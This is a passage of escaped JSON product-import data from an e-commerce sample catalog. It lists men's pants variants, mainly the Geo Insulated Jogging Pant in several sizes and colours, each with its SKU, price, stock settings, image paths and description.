Pants,material=LumaTech&trade;|Polyester|Spandex,pattern=Solid,climate=Cold|Cool|Wintry,eco_collection=No,performance_fabric=Yes,erin_recommends=No,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=MP02-32-Blue,size=32,color=Blue|sku=MP02-32-Gray,size=32,color=Gray|sku=MP02-32-Red,size=32,color=Red|sku=MP02-33-Blue,size=33,color=Blue|sku=MP02-33-Gray,size=33,color=Gray|sku=MP02-33-Red,size=33,color=Red|sku=MP02-34-Blue,size=34,color=Blue|sku=MP02-34-Gray,size=34,color=Gray|sku=MP02-34-Red,size=34,color=Red|sku=MP02-36-Blue,size=36,color=Blue|sku=MP02-36-Gray,size=36,color=Gray|sku=MP02-36-Red,size=36,color=Red\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/p\\/mp02-gray_back.jpg\",\"image\":\"\\/m\\/p\\/mp02-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp02-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/p\\/mp02-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_bottom\":\"Workout Pants|Track Pants\",\"material\":\"LumaTech&trade;|Polyester|Spandex\",\"pattern\":\"Solid\",\"climate\":\"Cold|Cool|Wintry\",\"eco_collection\":\"No\",\"performance_fabric\":\"Yes\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"No\"},\"704\":{\"sku\":\"MP03-32-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Geo Insulated Jogging Pant-32-Blue\",\"description\":\"<p>In the cold, even the toughest guys shiver, unless they\'re in the Geo Insulated Jogging Pant. Lightweight and wind resistant, they block brutal wind gusts and warm you to the bone. Breathable mesh keeps them dry on the inside.<\\/p>\\n<p>&bull; Black polyester spandex pants with zipper pockets.<br \\/>&bull; Reflective safety accents. <br \\/>&bull; Loose fit.<br \\/>&bull; On-seam pockets. <br \\/>&bull; 8\\\" leg zips. 32\\\" inseam. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"51\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"geo-insulated-jogging-pant-32-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp03-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp03-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp03-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp03-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp03-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Blue\"},\"705\":{\"sku\":\"MP03-32-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Geo Insulated Jogging Pant-32-Green\",\"description\":\"<p>In the cold, even the toughest guys shiver, unless they\'re in the Geo Insulated Jogging Pant. Lightweight and wind resistant, they block brutal wind gusts and warm you to the bone. Breathable mesh keeps them dry on the inside.<\\/p>\\n<p>&bull; Black polyester spandex pants with zipper pockets.<br \\/>&bull; Reflective safety accents. <br \\/>&bull; Loose fit.<br \\/>&bull; On-seam pockets. <br \\/>&bull; 8\\\" leg zips. 32\\\" inseam. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"51\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"geo-insulated-jogging-pant-32-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp03-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp03-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp03-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp03-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp03-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Green\"},\"706\":{\"sku\":\"MP03-32-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Geo Insulated Jogging Pant-32-Red\",\"description\":\"<p>In the cold, even the toughest guys shiver, unless they\'re in the Geo Insulated Jogging Pant. Lightweight and wind resistant, they block brutal wind gusts and warm you to the bone. Breathable mesh keeps them dry on the inside.<\\/p>\\n<p>&bull; Black polyester spandex pants with zipper pockets.<br \\/>&bull; Reflective safety accents. <br \\/>&bull; Loose fit.<br \\/>&bull; On-seam pockets. <br \\/>&bull; 8\\\" leg zips. 32\\\" inseam. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"51\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"geo-insulated-jogging-pant-32-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp03-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp03-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp03-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp03-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp03-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Red\"},\"707\":{\"sku\":\"MP03-33-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Geo Insulated Jogging Pant-33-Blue\",\"description\":\"<p>In the cold, even the toughest guys shiver, unless they\'re in the Geo Insulated Jogging Pant. Lightweight and wind resistant, they block brutal wind gusts and warm you to the bone. Breathable mesh keeps them dry on the inside.<\\/p>\\n<p>&bull; Black polyester spandex pants with zipper pockets.<br \\/>&bull; Reflective safety accents. <br \\/>&bull; Loose fit.<br \\/>&bull; On-seam pockets. <br \\/>&bull; 8\\\" leg zips. 32\\\" inseam. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"51\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"geo-insulated-jogging-pant-33-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp03-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp03-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp03-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=33,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp03-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp03-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"33\",\"color\":\"Blue\"},\"708\":{\"sku\":\"MP03-33-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Geo Insulated Jogging Pant-33-Green\",\"description\":\"<p>In the cold, even the toughest guys shiver, unless they\'re in the Geo Insulated Jogging Pant. Lightweight and wind resistant, they block brutal wind gusts and warm you to the bone. Breathable mesh keeps them dry on the inside.<\\/p>\\n<p>&bull; Black polyester spandex pants with zipper pockets.<br \\/>&bull; Reflective safety accents. <br \\/>&bull; Loose fit.<br \\/>&bull; On-seam pockets. <br \\/>&bull; 8\\\" leg zips. 32\\\" inseam. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"51\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"geo-insulated-jogging-pant-33-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp03-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp03-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp03-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=33,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp03-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp03-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"33\",\"color\":\"Green\"},\"709\":{\"sku\":\"MP03-33-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Geo Insulated Jogging Pant-33-Red\",\"description\":\"<p>In the cold, even the toughest guys shiver, unless they\'re in the Geo Insulated Jogging Pant. Lightweight and wind resistant, they block brutal wind gusts and warm you to the bone. Breathable mesh keeps them dry on the inside.<\\/p>\\n<p>&bull; Black polyester spandex pants with zipper pockets.<br \\/>&bull; Reflective safety accents. <br \\/>&bull; Loose fit.<br \\/>&bull; On-seam pockets. <br \\/>&bull; 8\\\" leg zips. 32\\\" inseam. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"51\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"geo-insulated-jogging-pant-33-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp03-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp03-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp03-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=33,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp03-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp03-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"33\",\"color\":\"Red\"},\"710\":{\"sku\":\"MP03-34-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Geo Insulated Jogging Pant-34-Blue\",\"description\":\"<p>In the cold, even the toughest guys shiver, unless they\'re in the Geo Insulated Jogging Pant. Lightweight and wind resistant, they block brutal wind gusts and warm you to the bone. Breathable mesh keeps them dry on the inside.<\\/p>\\n<p>&bull; Black polyester spandex pants with zipper pockets.<br \\/>&bull; Reflective safety accents. <br \\/>&bull; Loose fit.<br \\/>&bull; On-seam pockets. <br \\/>&bull; 8\\\" leg zips. 32\\\" inseam. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"51\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"geo-insulated-jogging-pant-34-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp03-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp03-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp03-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp03-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp03-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Blue\"},\"711\":{\"sku\":\"MP03-34-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Geo Insulated Jogging Pant-34-Green\",\"description\":\"<p>In the cold, even the toughest guys shiver, unless they\'re in the Geo Insulated Jogging Pant. Lightweight and wind resistant, they block brutal wind gusts and warm you to the bone. Breathable mesh keeps them dry on the inside.<\\/p>\\n<p>&bull; Black polyester spandex pants with zipper pockets.<br \\/>&bull; Reflective safety accents. <br \\/>&bull; Loose fit.<br \\/>&bull; On-seam pockets. <br \\/>&bull; 8\\\" leg zips. 32\\\" inseam. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"51\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"geo-insulated-jogging-pant-34-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp03-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp03-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp03-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp03-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp03-